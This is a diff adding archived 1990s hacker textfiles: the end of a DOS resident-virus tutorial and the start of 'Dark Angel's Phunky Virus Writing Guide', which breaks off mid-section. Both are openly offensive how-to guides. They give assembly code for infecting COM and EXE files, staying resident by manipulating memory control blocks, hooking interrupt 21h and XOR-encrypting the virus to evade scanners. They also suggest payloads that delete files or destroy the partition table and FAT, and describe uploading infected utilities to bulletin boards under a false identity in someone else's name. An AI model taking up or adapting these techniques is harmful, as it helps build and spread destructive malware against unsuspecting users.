+  restore the  overwritten  bytes  at  the  beginning  of  the  file.    This
+  restoration takes place only in memory and is therefore far from permanent.
+  Since COM files always load in a single memory segment and begin loading at
+  offset 100h  in the  memory  segment  (to  make  room  for  the  PSP),  the
+  restoration procedure  is very  simple.   For example,  if the  first three
+  bytes of  a COM  file were  stored in a buffer called "first3" before being
+  overwritten by the virus, then the following code would restore the code in
+  memory:
+  
+    mov  di,100h          ; Absolute location of destination
+    lea  si,[bp+first3]   ; Load address of saved bytes.
+                          ; Assume bp = "delta offset"
+    movsw                 ; Assume CS = DS = ES and a cleared direction flag
+    movsb                 ; Move three bytes
+  
+  The problem of returning control to the program still remains.  This simply
+  consists of  forcing the  program to  transfer control to offset 100h.  The
+  easiest routine follows:
+  
+    mov  di,100h
+    jmp  di
+  
+  There are  numerous variations of this routine, but they all accomplish the
+  basic task of setting the ip to 100h.
+  
+  You should  also understand  the concept  behind EXE infection by now.  EXE
+  infection, at  its most  basic level, consists of changing certain bytes in
+  the EXE  header.   The trick  is simply  to undo  all the changes which the
+  virus made.  The code follows:
+  
+    mov     ax, es                          ; ES = segment of PSP
+    add     ax, 10h                         ; Loading starts after PSP
+    add     word ptr cs:[bp+OrigCSIP+2], ax ; Header segment value was
+                                            ; relative to end of PSP
+    cli
+    add     ax, word ptr cs:[bp+OrigSSSP+2] ; Adjust the stack as well
+    mov     ss, ax
+    mov     sp, word ptr cs:[bp+OrigSSSP]
+    sti
+    db      0eah                            ; JMP FAR PTR SEG:OFF
+  OrigCSIP  dd ?                            ; Put values from the header
+  OrigSSSP  dd ?                            ; into here
+  
+  If the  virus is  an EXE-specific  infector but you still wish to use a COM
+  file as  the carrier file, then simply set the OrigCSIP value to FFF0:0000.
+  This will  be changed  by the  restoration routine  to PSP:0000  which  is,
+  conveniently, an int 20h instruction.
+  
+  All that  stuff should  not be  new.   Now we shall tread on new territory.
+  There are  two methods  of residency.  The first is the weenie method which
+  simply consists of using DOS interrupts to do the job for you.  This method
+  sucks because  it is  1) easily  trappable by  even the  most primitive  of
+  resident virus  monitors and  2) forces the program to terminate execution,
+  thereby alerting  the user  to the  presence of the virus.  I will not even
+  present code  for the  weenie method  because, as  the name suggests, it is
+  only for  weenies.   Real programmers  write their  own residency routines.
+  This basically consists of MCB-manipulation.  The general method is:
+  
+  1.   Check for prior installation.  If already installed, exit the virus.
+  2.   Find the top of memory.
+  3.   Allocate the high memory.
+  4.   Copy the virus to high memory.
+  5.   Swap the interrupt vectors.
+  
+  There are  several variations  on this technique and they will be discussed
+  as the need arises.
+  
+  ������������������
+  INSTALLATION CHECK
+  ������������������
+  There are  several different  types of installation check.  The most common
+  is a  call to int 21h with AX set to a certain value.  If certain registers
+  are returned  set to  certain values,  then the  virus is  resident.    For
+  example, a sample residency check would be:
+  
+    mov  ax,9999h  ; residency check
+    int  21h
+    cmp  bx,9999h  ; returns bx=9999h if installed
+    jz   already_installed
+  
+  When choosing  a value  for ax in the installation check, make sure it does
+  not conflict  with an  existing function  unless the  function is harmless.
+  For example,  do not  use display  string (ah=9)  unless you  wish to  have
+  unpredictable results  when the virus is first being installed.  An example
+  of a harmless function is get DOS version (ah=30h) or flush keyboard buffer
+  (ah=0bh).   Of course, if the check conflicts with a current function, make
+  sure it  is narrow  enough so no programs will have a problem with it.  For
+  example, do  not merely trap ah=30h, but trap ax=3030h or even ax=3030h and
+  bx=3030h.
+  
+  Another  method  of  checking  for  residency  is  to  search  for  certain
+  characteristics of  the virus.   For  example, if  the virus always sets an
+  unused interrupt  vector to  point to  its code, a possible residency check
+  would be to search the vector for the virus characteristics.  For example:
+  
+    xor  ax,ax
+    mov  ds,ax     ; ds->interrupt table
+    les  bx,ds:[60h*4] ; get address of interrupt 60h
+                   ; assume the virus traps this and puts its int 21h handler
+                   ; here
+    cmp  es:bx,0FF2Eh ; search for the virus string
+     .
+     .
+     .
+  int60:
+    jmp far ptr cs:origint21
+  
+  When using this method, take care to ensure that there is no possibility of
+  this characteristic  being false when the virus is resident.  In this case,
+  another program must not trap the int 60h vector or else the check may fail
+  even if  the virus  is  already  resident,  thereby  causing  unpredictable
+  results.
+  
+  ����������������������
+  FIND THE TOP OF MEMORY
+  ����������������������
+  DOS generally  loads all available memory to a program upon loading.  Armed
+  with this  knowledge, the  virus can  easily determine the available memory
+  size.  Once again, the MCB structure is:
+  
+  Offset    Size Meaning
+  ------ ------- -------
+  0         BYTE 'M' or 'Z'
+  1         WORD Process ID (PSP of block's owner)
+  3         WORD Size in paragraphs
+  5      3 BYTES Reserved (Unused)
+  8      8 BYTES DOS 4+ uses this.  Yay.
+  
+    mov  ax,ds     ; Assume DS initially equals the segment of the PSP
+    dec  ax
+    mov  ds,ax     ; DS = MCB of infected program
+    mov  bx,ds:[3] ; Get MCB size (total available paragraphs to program)
+  
+  A simpler  method of  performing the same action is to use DOS's reallocate
+  memory function in the following manner:
+  
+    mov  ah,4ah    ; Alter memory allocation (assume ES = PSP)
+    mov  bx,0FFFFh ; Request a ridiculous amount of memory
+    int  21h       ; Returns maximum available memory in BX
+                   ; This is the same value as in ds:[3]
+  
+  ������������������������
+  ALLOCATE THE HIGH MEMORY
+  ������������������������
+  The easiest method to allocate memory is to let DOS do the work for you.
+  
+    mov  ah,4ah    ; Alter memory allocation (assume ES = PSP)
+    sub  bx,(endvirus-startvirus+15)/16+1 ; Assume BX originally held total
+                   ; memory available to the program (returned by earlier
+                   ; call to int 21h/function 4ah
+    int  21h
+  
+    mov  ah,48h    ; Allocate memory
+    mov  bx,(endvirus-startvirus+15)/16
+    int  21h
+    mov  es,ax     ; es now holds the high memory segment
+  
+    dec  bx
+    mov  byte ptr ds:[0], 'Z' ; probably not needed
+    mov  word ptr ds:[1], 8   ; Mark DOS as owner of MCB
+  
+  The purpose  of marking  DOS as  the owner  of the  MCB is  to prevent  the
+  deallocation of the memory area upon termination of the carrier program.
+  
+  Of course, some may prefer direct manipulation of the MCBs.  This is easily
+  accomplished.   If ds is equal to the segment of the carrier program's MCB,
+  then the following code will do the trick:
+  
+    ; Step 1) Shrink the carrier program's memory allocation
+    ; One paragraph is added for the MCB of the memory area which the virus
+    ; will inhabit
+    sub  ds:[3],(endvirus-startvirus+15)/16 + 1
+  
+    ; Step 2) Mark the carrier program's MCB as the last in the chain
+    ; This isn't really necessary, but it assures that the virus will not
+    ; corrupt the memory chains
+    mov  byte ptr ds:[0],'Z'
+  
+    ; Step 3) Alter the program's top of memory field in the PSP
+    ; This preserves compatibility with COMMAND.COM and any other program
+    ; which uses the field to determine the top of memory
+    sub  word ptr ds:[12h],(endvirus-startvirus+15)/16 + 1
+  
+    ; Step 4) Calculate the first usable segment
+    mov  bx,ds:[3] ; Get MCB size
+    stc            ; Add one for the MCB segment
+    adc  bx,ax     ; Assume AX still equals the MCB of the carrier file
+                   ; BX now holds first usable segment.  Build the MCB
+                   ; there
+    ; Alternatively, you can use the value in ds:[12h] as the first usable
+    ; segment:
+    ; mov  bx,ds:[12h]
+  
+    ; Step 5) Build the MCB
+    mov  ds,bx     ; ds holds the area to build the MCB
+    inc  bx        ; es now holds the segment of the memory area controlled
+    mov  es,bx     ; by the MCB
+    mov  byte ptr ds:[0],'Z' ; Mark the MCB as the last in the chain
+                   ; Note: you can have more than one MCB chain
+    mov  word ptr ds:[1],8   ; Mark DOS as the owner
+    mov  word ptr ds:[3],(endvirus-startvirus+15)/16 ; FIll in size field
+  
+  There is yet another method involving direct manipulation.
+  
+    ; Step 1) Shrink the carrier program's memory allocation
+    ; Note that rounding is to the nearest 1024 bytes and there is no
+    ; addition for an MCB
+    sub  ds:[3],((endvirus-startvirus+1023)/1024)*64
+  
+    ; Step 2) Mark the carrier program's MCB as the last in the chain
+    mov  byte ptr ds:[1],'Z'
+  
+    ; Step 3) Alter the program's top of memory field in the PSP
+    sub  word ptr ds:[12h],((endvirus-startvirus+1023)/1024)*64
+  
+    ; Step 4) Calculate the first usable segment
+    mov  es,word ptr ds:[12h]
+  
+    ; Step 5) Shrink the total memory as held in BIOS
+    ; Memory location 0:413h holds the total system memory in K
+    xor  ax,ax
+    mov  ds,ax
+    sub  ds:[413h],(endvirus-startvirus+1023)/1024 ; shrink memory size
+  
+  This method  is great  because it  is simple and short.  No MCB needs to be
+  created because  DOS will no longer allocate memory held by the virus.  The
+  modification of the field in the BIOS memory area guarantees this.
+  
+  �����������������������������
+  COPY THE VIRUS TO HIGH MEMORY
+  �����������������������������
+  This is  ridiculously easy  to do.  If ES holds the high memory segment, DS
+  holds CS, and BP holds the delta offset, then the following code will do:
+  
+    lea  si,[bp+offset startvirus]
+    xor  di,di     ; destination @ 0
+    mov  cx,(endvirus-startvirus)/2
+    rep  movsw     ; Copy away, use words for speed
+  
+  ����������������������
+  SWAP INTERRUPT VECTORS
+  ����������������������
+  There are,  once again,  two ways  to do this; via DOS or directly.  Almost
+  every programmer  worth his  salt has  played with interrupt vectors at one
+  time or another.  Via DOS:
+  
+    push es        ; es->high memory
+    pop  ds        ; ds->high memory
+    mov  ax,3521h  ; get old int 21h handler
+    int  21h       ; to es:bx
+    mov  word ptr ds:oldint21,bx  ; save it
+    mov  word ptr ds:oldint21+2,es
+    mov  dx,offset int21 ; ds:dx->new int 21h handler in virus
+    mov  ax,2521h  ; set handler
+    int  21h
+  
+  And direct manipulation:
+    xor  ax,ax
+    mov  ds,ax
+    lds  bx,ds:[21h*4]
+    mov  word ptr es:oldint21,bx
+    mov  word ptr es:oldint21+2,ds
+    mov  ds,ax
+    mov  ds:[21h*4],offset int21
+    mov  ds:[21h*4+2],es
+  
+  Delta offset  calculations  are  not  needed  since  the  location  of  the
+  variables is  known.   This is because the virus is always loaded into high
+  memory starting in offset 0.
+  
+  �����������������
+  INTERRUPT HANDLER
+  �����������������
+  The interrupt  handler intercepts  function calls  to DOS and waylays them.
+  The interrupt  handler typically  begins with  a check  for a  call to  the
+  installation check.  For example:
+  
+  int21:
+    cmp  ax,9999h  ; installation check?
+    jnz  not_installation_check
+    xchg ax,bx     ; return bx = 9999h if installed
+    iret           ; exit interrupt handler
+  not_installation_check:
+  ; rest of interrupt handler goes here
+  
+  With this  out of  the way,  the virus  can trap whichever DOS functions it
+  wishes.    Generally  the  most  effective  function  to  trap  is  execute
+  (ax=4b00h), as  the most commonly executed files will be infected.  Another
+  function to  trap, albeit  requiring more work, is handle close.  This will
+  infect  on   copies,  viewings,  patchings,  etc.    With  some  functions,
+  prechaining is  desired; others,  postchaining.   Use common sense.  If the
+  function destroys  the filename  pointer, then  use prechaining.    If  the
+  function   needs   to  be   completed  before  infection  can  take  place,
+  postchaining should be used.  Prechaining is simple:
+  
+    pushf           ; simulate an int 21h call
+    call dword ptr cs:oldint21
+  
+  ; The following code ensures that the flags will be properly set upon
+  ; return to the caller
+    pushf
+    push bp
+    push ax
+  
+  ; flags         [bp+10]
+  ; calling CS:IP [bp+6]
+  ; flags new     [bp+4]
+  ; bp            [bp+2]
+  ; ax            [bp]
+  
+    mov  bp, sp     ; setup stack frame
+    mov  ax, [bp+4] ; get new flags
+    mov  [bp+10], ax; replace the old with the new
+  
+    pop  ax         ; restore stack
+    pop  bp
+    popf
+  
+  To exit  the interrupt  handler after  prechaining, use  an iret  statement
+  rather than a retn or retf.  Postchaining is even simpler:
+  
+    jmp  dword ptr cs:oldint21 ; this never returns to the virus int handler
+  
+  When leaving  the interrupt  handler, make  sure  that  the  stack  is  not
+  unbalanced and  that the  registers were  not altered.   Save the registers
+  right after prechaining and long before postchaining.
+  
+  Infection in  a resident  virus is  essentially  the  same  as  that  in  a
+  nonresident virus.   The  only difference occurs when the interrupt handler
+  traps one  of the functions used in the infection routine.  For example, if
+  handle close is trapped, then the infection routine must replace the handle
+  close int 21h call with a call to the original interrupt 21h handler, a la:
+  
+    pushf
+    call dword ptr cs:oldint21
+  
+  It is also necessary to handle encryption in another manner with a resident
+  virus.  In the nonresident virus, it was not necessary to preserve the code
+  at all  times.   However, it  is desirable to keep the interrupt handler(s)
+  decrypted, even  when infecting.   Therefore,  the virus  should  keep  two
+  copies of  itself in  memory, one  as code  and one as data.  The encryptor
+  should encrypt  the secondary  copy  of  the  virus,  thereby  leaving  the
+  interrupt handler(s)  alone.   This is  especially important  if the  virus
+  traps other interrupts such as int 9h or int 13h.
+  
+  ����������������������������
+  A THEORY ON RESIDENT VIRUSES
+  ����������������������������
+  Resident viruses  can typically  be divided  into two  categories; slow and
+  fast infectors.  They each have their own advantages and disadvantages.
+  
+  Slow infectors  do not  infect except in the case of a file creation.  This
+  infector traps file creates and infects upon the closing of the file.  This
+  type of  virus infects  on new  file creations  and copying  of files.  The
+  disadvantage is  that the  virus spreads slowly.  This disadvantage is also
+  an advantage,  as this  may keep  it undetected  for a long time.  Although
+  slow infectors sound ineffective, in reality they can work well.  Infection
+  on file  creations means that checksum/CRC virus detectors won't be able to
+  checksum/CRC the  file until  after it  has been  infected.   Additionally,
+  files are  often copied  from one  directory to  another after testing.  So
+  this method can work.
+  
+  Fast infectors  infect on  executes.   This type  of virus will immediately
+  attack commonly  used files,  ensuring the continual residency of the virus
+  in subsequent  boots.   This is  the primary  advantage, but it is also the
+  primary disadvantage.   The  infector works  so rapidly  that the  user may
+  quickly detect  a discrepancy with the system, especially if the virus does
+  not utilise any stealth techniques.
+  
+  Of course,  there is  no  "better"  way.    It  is  a  matter  of  personal
+  preference.   The vast  majority  of  viruses  today  are  fast  infectors,
+  although slow infectors are beginning to appear with greater frequency.
+  
+  If the  virus is  to infect  on a  create or  open, it  first must copy the
+  filename to  a buffer,  execute the  call, and  save the handle.  The virus
+  must then  wait for  a handle close corresponding to that handle and infect
+  using the  filename stored  in the  buffer.  This is the simplest method of
+  infecting after a handle close without delving into DOS internals.
+  
+  ������������������������������
+  IF YOU DON'T UNDERSTAND IT YET
+  ������������������������������
+  don't despair;  it will  come after  some time and much practise.  You will
+  soon find  that resident  viruses  are  easier  to  code  than  nonresident
+  viruses.   That's all  for this  installment, but  be sure to grab the next
+  one.
diff --git a/textfiles.com/virus/ps_vir1.vir b/textfiles.com/virus/ps_vir1.vir
new file mode 100644
index 00000000..f6b715af
--- /dev/null
+++ b/textfiles.com/virus/ps_vir1.vir
@@ -0,0 +1,447 @@
+    //==//  //  //  /||      //      //====  //==//  //|   //
+   //  //  //  //  //||     //      //      //  //  //||  //
+  //==//  //==//  //=||    //      //      //  //  // || //
+ //      //  //  //  ||   //      //      //  //  //  ||//
+//      //  //  //   ||  //====  //====  //==//  //   ||/
+
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+DISCLAIMER: The author hereby disclaims himself
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+DEDICATION: This was written to make the lives
+  of scum such as Patty Hoffman, John McAffee,
+  and Ross Greenberg a living hell.
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+OTHER STUFF:  Thanks go to The Shade of Sorrow,
+  Demogorgon, and Orion Rouge on their comments
+  (which I occasionally listened to!).   Thanks
+  also to Hellraiser, who gave me an example of
+  some virus source code (his own, of course).
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+
+Dark Angel's Phunky Virus Writing Guide
+---- ------- ------ ----- ------- -----
+Virii are  wondrous creations written for the sole purpose of spreading and
+destroying the  systems of unsuspecting fools.  This eliminates the systems
+of simpletons  who can't  tell that there is a problem when a 100 byte file
+suddenly blossoms  into a  1,000 byte  file.   Duh.  These low-lifes do not
+deserve to  exist, so  it is  our sacred duty to wipe their hard drives off
+the face of the Earth.  It is a simple matter of speeding along survival of
+the fittest.
+
+Why did  I create  this guide?  After writing several virii, I have noticed
+that virus  writers generally  learn how to write virii either on their own
+or by  examining the  disassembled code  of  other  virii.    There  is  an
+incredible lack  of information  on the  subject.   Even books published by
+morons such as Burger are, at best, sketchy on how to create a virus.  This
+guide will show you what it takes to write a virus and also will give you a
+plethora of source code to include in your own virii.
+
+Virus writing  is not  as hard  as you  might first  imagine.   To write an
+effective virus,  however, you  *must*  know  assembly  language.    Short,
+compact code  are hallmarks  of assembly  language and  these are desirable
+characteristics of  virii.  However, it is *not* necessary to write in pure
+assembly.   C may  also be  used, as  it allows almost total control of the
+system while  generating relatively compact code (if you stay away from the
+library functions).   However,  you still  must access  the interrupts,  so
+assembly knowledge  is still  required.  However, it is still best to stick
+with pure  assembly,  since  most  operations  are  more  easily  coded  in
+assembly.  If you do not know assembly, I would recommend picking up a copy
+of The Microsoft Macro Assembler Bible (Nabajyoti Barkakati, ISBN #: 0-672-
+22659-6).   It is an easy-to-follow book covering assembly in great detail.
+Also get yourself a copy of Undocumented DOS (Schulman, et al, ISBN #0-201-
+57064-5), as it is very helpful.
+
+The question  of which  compiler to  use arises  often.   I  suggest  using
+Borland Turbo  Assembler and/or  Borland C++.   I  do not  have a  copy  of
+Zortech C  (it was  too large  to download), but I would suspect that it is
+also a good choice.  Stay away from Microsoft compilers, as they are not as
+flexible nor as efficient as those of other vendors.
+
+A few more items round out the list of tools helpful in constructing virii.
+The latest version of Norton Utilities is one of the most powerful programs
+available, and  is immeasurably  helpful.   MAKE SURE YOU HAVE A COPY!  You
+can find  it on  any decent board.  It can be used during every step of the
+process, from  the writing  to the testing.  A good debugger helps.  Memory
+management  utilities   such  as   MAPMEM,  PMAP,   and  MARK/RELEASE,  are
+invaluable, especially  when coding  TSR virii.   Sourcer,  the  commenting
+disassembler, is  useful when  you wish  to examine the code of other virii
+(this is a good place to get ideas/techniques for your virus).
+
+Now that  you have  your tools,  you are  ready to  create a  work  of  art
+designed to smash the systems of cretins.  There are three types of virii:
+
+     1) Tiny virii (under 500 bytes) which are designed to be  undetectable
+        due to their small size.   TINY  is  one  such  virus.    They  are
+        generally very simple because their code length is so limited.
+     2) Large  virii  (over 1,500 bytes)   which   are   designed   to   be
+        undetectable because they cover their tracks very  well  (all  that
+        code DOES have a use!).  The best example  of  this  is  the  Whale
+        virus, which is perhaps the best 'Stealth' virus in existence.
+     3) Other virii which are not designed to be hidden at all (the writers
+        don't give  a  shit).    The  common  virus  is  like  this.    All
+        overwriting virii are in this category.
+
+You must  decide which  kind of  virus you wish to write.  I will mostly be
+discussing  the  second  type  (Stealth  virii).    However,  many  of  the
+techniques discribed  may be easily applied to the first type (tiny virii).
+However, tiny  virii generally do not have many of the "features" of larger
+virii, such  as  directory  traversal.    The  third  type  is  more  of  a
+replicating trojan-type,  and will  warrant a  brief  (very,  very  brief!)
+discussion later.
+
+A virus may be divided into three parts: the replicator, the concealer, and
+the bomb.   The  replicator part  controls the spread of the virus to other
+files, the concealer keeps the virus from being detected, and the bomb only
+executes when  the activation  conditions of the virus (more on that later)
+are satisfied.
+
+-=-=-=-=-=-=-=-
+THE REPLICATOR
+-=-=-=-=-=-=-=-
+The job  of the  replicator is to spread the virus throughout the system of
+the clod  who has caught the virus.  How does it do this without destroying
+the file it infects?  The easiest type of replicator infects COM files.  It
+first saves  the first  few bytes  of the  infected file.  It then copies a
+small portion of its code to the beginning of the file, and the rest to the
+end.
+
+  +----------------+      +------------+
+  | P1 | P2        |      | V1 | V2    |
+  +----------------+      +------------+
+ The uninfected file     The virus code
+
+In the  diagram, P1 is part 1 of the file, P2 is part 2 of the file, and V1
+and V2  are parts 1 and 2 of the virus.  Note that the size of P1 should be
+the same  as the size of V1, but the size of P2 doesn't necessarily have to
+be the  same size  as V2.   The  virus first  saves P1 and copies it to the
+either 1)  the end  of the  file or 2) inside the code of the virus.  Let's
+assume it copies the code to the end of the file.  The file now looks like:
+
+  +---------------------+
+  | P1 | P2        | P1 |
+  +---------------------+
+
+Then, the  virus copies  the first  part of  itself to the beginning of the
+file.
+
+  +---------------------+
+  | V1 | P2        | P1 |
+  +---------------------+
+
+Finally, the virus copies the second part of itself to the end of the file.
+The final, infected file looks like this:
+
+  +-----------------------------+
+  | V1 | P2        | P1 | V2    |
+  +-----------------------------+
+
+The question  is: What  the fuck  do V1 and V2 do?  V1 transfers control of
+the program to V2.  The code to do this is simple.
+
+     JMP FAR PTR Duh       ; Takes four bytes
+Duh  DW  V2_Start          ; Takes two bytes
+
+Duh is  a far pointer (Segment:Offset) pointing to the first instruction of
+V2.   Note that  the value  of Duh must be changed to reflect the length of
+the file  that is  infected.   For example,  if the  original size  of  the
+program is  79 bytes,  Duh must  be changed  so  that  the  instruction  at
+CS:[155h] is  executed.   The value of Duh is obtained by adding the length
+of V1,  the original size of the infected file, and 256 (to account for the
+PSP).  In this case, V1 = 6 and P1 + P2 = 79, so 6 + 79 + 256 = 341 decimal
+(155 hex).
+
+An alternate, albeit more difficult to understand, method follows:
+
+     DB 1101001b              ; Code for JMP (2 byte-displacement)
+Duh  DW V2_Start - OFFSET Duh ; 2 byte displacement
+
+This inserts  the jump  offset directly  into the  code following  the jump
+instruction.  You could also replace the second line with
+
+     DW V2_Start - $
+
+which accomplishes the same task.
+
+V2 contains the rest of the code, i.e. the stuff that does everything else.
+The last  part of  V2 copies  P1 over  V1 (in memory, not on disk) and then
+transfers control  to the  beginning of the file (in memory).  The original
+program will  then run happily as if nothing happened.  The code to do this
+is also very simple.
+
+     MOV SI, V2_START      ; V2_START is a LABEL marking where V2 starts
+     SUB SI, V1_LENGTH     ; Go back to where P1 is stored
+     MOV DI, 0100h         ; All COM files are loaded @ CS:[100h] in memory
+     MOV CX, V1_LENGTH     ; Move CX bytes
+     REP MOVSB             ; DS:[SI] -> ES:[DI]
+
+     MOV DI, 0100h
+     JMP DI
+
+This code assumes that P1 is located just before V2, as in:
+
+P1_Stored_Here:
+     .
+     .
+     .
+V2_Start:
+
+It also  assumes ES  equals CS.  If these assumptions are false, change the
+code accordingly.  Here is an example:
+
+     PUSH CS               ; Store CS
+     POP  ES               ;  and move it to ES
+                           ; Note MOV ES, CS is not a valid instruction
+     MOV SI, P1_START      ; Move from whereever P1 is stored
+     MOV DI, 0100h         ;  to CS:[100h]
+     MOV CX, V1_LENGTH
+     REP MOVSB
+
+     MOV DI, 0100h
+     JMP DI
+
+This code  first moves CS into ES and then sets the source pointer of MOVSB
+to where  P1 is located.  Remember that this is all taking place in memory,
+so you  need the  OFFSET of P1, not just the physical location in the file.
+The offset  of P1  is 100h  higher than  the physical file location, as COM
+files are loaded starting from CS:[100h].
+
+So here's a summary of the parts of the virus and location labels:
+
+V1_Start:
+     JMP FAR PTR Duh
+Duh  DW  V2_Start
+V1_End:
+
+P2_Start:
+P2_End:
+
+P1_Start:
+  ; First part of the program stored here for future use
+P1_End:
+
+V2_Start:
+  ; Real Stuff
+V2_End:
+
+V1_Length EQU V1_End - V1_Start
+
+Alternatively, you could store P1 in V2 as follows:
+
+V2_Start:
+
+P1_Start:
+P1_End:
+
+V2_End:
+
+That's all there is to infecting a COM file without destroying it!  Simple,
+no?   EXE files,  however, are a little tougher to infect without rendering
+them inexecutable - I will cover this topic in a later file.
+
+Now let  us turn our attention back to the replicator portion of the virus.
+The steps are outlined below:
+
+     1) Find a file to infect
+     2) Check if it is already infected
+     3) If so, go back to 1
+     4) Infect it
+     5) If infected enough, quit
+     6) Otherwise, go back to 1
+
+Finding a  file to  infect is  a  simple  matter  of  writing  a  directory
+traversal procedure  and issuing  FINDFIRST  and  FINDNEXT  calls  to  find
+possible files  to infect.   Once  you find  the file, open it and read the
+first few  bytes.   If they are the same as the first few bytes of V1, then
+the file  is already  infected.  If the first bytes of V1 are not unique to
+your virus,  change it  so that they are.  It is *extremely* important that
+your virus  doesn't reinfect  the same  files, since that was how Jerusalem
+was first  detected.   If the file wasn't already infected, then infect it!
+Infection should take the following steps:
+
+     1) Change the file attributes to nothing.
+     2) Save the file date/time stamps.
+     3) Close the file.
+     4) Open it again in read/write mode.
+     5) Save P1 and append it to the end of the file.
+     6) Copy V1 to the beginning, but change the offset which it JMPs to so
+        it transfers control correctly. See the previous part on infection.
+     7) Append V2 to the end of the file.
+     8) Restore file attributes/date/time.
+
+You should  keep a counter of the number of files infected during this run.
+If the number exceeds, say three, then stop.  It is better to infect slowly
+then to give yourself away by infecting the entire drive at once.
+
+You must  be sure  to cover  your tracks  when you infect a file.  Save the
+file's  original   date/time/attributes  and  restore  them  when  you  are
+finished.   THIS IS VERY IMPORTANT!  It takes about 50 to 75 bytes of code,
+probably less,  to do  these few simple things which can do wonders for the
+concealment of your program.
+
+I will  include code for the directory traversal function, as well as other
+parts of the replicator in the next installment of my phunky guide.
+
+-=-=-=-=-
+CONCEALER
+-=-=-=-=-
+This is  the part  which conceals  the program  from notice by the everyday
+user and virus scanner.  The simplest form of concealment is the encryptor.
+The code for a simple XOR encryption system follows:
+
+encrypt_val   db   ?
+
+decrypt:
+encrypt:
+     mov ah, encrypt_val
+
+     mov cx, part_to_encrypt_end - part_to_encrypt_start
+     mov si, part_to_encrypt_start
+     mov di, si
+
+xor_loop:
+     lodsb                 ; DS:[SI] -> AL
+     xor al, ah
+     stosb                 ; AL -> ES:[DI]
+     loop xor_loop
+     ret
+
+Note the encryption and decryption procedures are the same.  This is due to
+the weird  nature of  XOR.   You can CALL these procedures from anywhere in
+the program,  but make sure you do not call it from a place within the area
+to be  encrypted, as  the program  will crash.  When writing the virus, set
+the encryption  value to  0.  part_to_encrypt_start and part_to_encrypt_end
+sandwich the area you wish to encrypt.  Use a CALL decrypt in the beginning
+of V2  to unencrypt  the file  so your  program can  run.  When infecting a
+file, first change the encrypt_val, then CALL encrypt, then write V2 to the
+end of the file, and CALL decrypt.  MAKE SURE THIS PART DOES NOT LIE IN THE
+AREA TO BE ENCRYPTED!!!
+
+This is how V2 would look with the concealer:
+
+V2_Start:
+
+Concealer_Start:
+  .
+  .
+  .
+Concealer_End:
+
+Replicator_Start:
+  .
+  .
+  .
+Replicator_End:
+
+Part_To_Encrypt_Start:
+  .
+  .
+  .
+Part_To_Encrypt_End:
+V2_End:
+
+Alternatively, you  could move  parts  of  the  unencrypted  stuff  between
+Part_To_Encrypt_End and V2_End.
+
+The value  of encryption  is readily  apparent.  Encryption makes it harder
+for virus  scanners to  locate your virus.  It also hides some text strings
+located in  your program.   It is the easiest and shortest way to hide your
+virus.
+
+Encryption is only one form of concealment.  At least one other virus hooks
+into the  DOS interrupts  and alters  the output  of DIR  so the file sizes
+appear normal.   Another  concealment scheme  (for TSR virii) alters DOS so
+memory utilities  do not  detect the  virus.   Loading the virus in certain
+parts of  memory allow  it to survive warm reboots.  There are many stealth
+techniques, limited only by the virus writer's imagination.
+
+-=-=-=-=-
+THE BOMB
+-=-=-=-=-
+So now all the boring stuff is over.  The nastiness is contained here.  The
+bomb part  of the virus does all the deletion/slowdown/etc which make virii
+so annoying.   Set  some activation  conditions of  the virus.  This can be
+anything, ranging  from when  it's your  birthday to  when  the  virus  has
+infected 100  files.   When these  conditions are met, then your virus does
+the good stuff.  Some suggestions of possible bombs:
+
+     1) System slowdown - easily  handled  by  trapping  an  interrupt  and
+        causing a delay when it activates.
+     2) File deletion - Delete all ZIP files on the drive.
+     3) Message display - Display a nice message saying  something  to  the
+        effect of "You are fucked."
+     4) Killing/Replacing the Partition Table/Boot Sector/FAT of  the  hard
+        drive - This is very nasty, as most dimwits cannot fix this.
+
+This is, of course, the fun part of writing a virus, so be original!
+
+-=-=-=-=-=-=-=-
+OFFSET PROBLEMS
+-=-=-=-=-=-=-=-
+There is  one caveat  regarding calculation of offsets.  After you infect a
+file, the  locations of  variables change.  You MUST account for this.  All
+relative offsets  can stay  the same, but you must add the file size to the
+absolute offsets  or your  program will  not work.  This is the most tricky
+part of  writing virii  and taking  these into  account can  often  greatly
+increase the  size of  a virus.   THIS  IS VERY IMPORTANT AND YOU SHOULD BE
+SURE TO  UNDERSTAND THIS BEFORE ATTEMPTING TO WRITE A NONOVERWRITING VIRUS!
+If you  don't, you'll  get fucked  over and  your virus WILL NOT WORK!  One
+entire part of the guide will be devoted to this subject.
+
+-=-=-=-
+TESTING
+-=-=-=-
+Testing virii  is a  dangerous yet  essential part  of the  virus  creation
+process.   This is  to make  certain that people *will* be hit by the virus
+and, hopefully,  wiped out.   Test  thoroughly and  make sure  it activates
+under the  conditions.  It would be great if everyone had a second computer
+to test  their virii  out, but,  of course, this is not the case.  So it is
+ESSENTIAL that  you keep BACKUPS of your files, partition, boot record, and
+FAT.   Norton is  handy in  this doing  this.  Do NOT disregard this advice
+(even though  I know  that you will anyway) because you WILL be hit by your
+own virii.   When  I wrote my first virus, my system was taken down for two
+days because I didn't have good backups.  Luckily, the virus was not overly
+destructive.   BACKUPS MAKE  SENSE!  LEECH A BACKUP PROGRAM FROM YOUR LOCAL
+PIRATE BOARD!   I find a RamDrive is often helpful in testing virii, as the
+damage is  not permanent.   RamDrives  are also useful for testing trojans,
+but that is the topic of another file...
+
+-=-=-=-=-=-=-
+DISTRIBUTION
+-=-=-=-=-=-=-
+This is  another fun  part of  virus writing.   It  involves  sending  your
+brilliantly-written  program   through  the  phone  lines  to  your  local,
+unsuspecting bulletin  boards.   What you  should do  is infect a file that
+actually does something (leech a useful utility from another board), infect
+it, and upload it to a place where it will be downloaded by users all over.
+The best  thing is  that it  won't be detected by puny scanner-wanna-bes by
+McAffee, since it is new!  Oh yeah, make sure you are using a false account
+(duh).   Better yet,  make a  false account  with the  name/phone number of
+someone you  don't like  and upload  the infected  file under the his name.
+You can  call back  from time to time and use a door such as ZDoor to check
+the spread  of the virus.  The more who download, the more who share in the
+experience of your virus!
+
+I promised a brief section on overwriting virii, so here it is...
+-=-=-=-=-=-=-=-=-
+OVERWRITING VIRII
+-=-=-=-=-=-=-=-=-
+All these  virii do  is spread  throughout the  system.   They  render  the
+infected files  inexecutable, so they are easily detected.  It is simple to
+write one:
+
+   +-------------+   +-----+   +-------------+
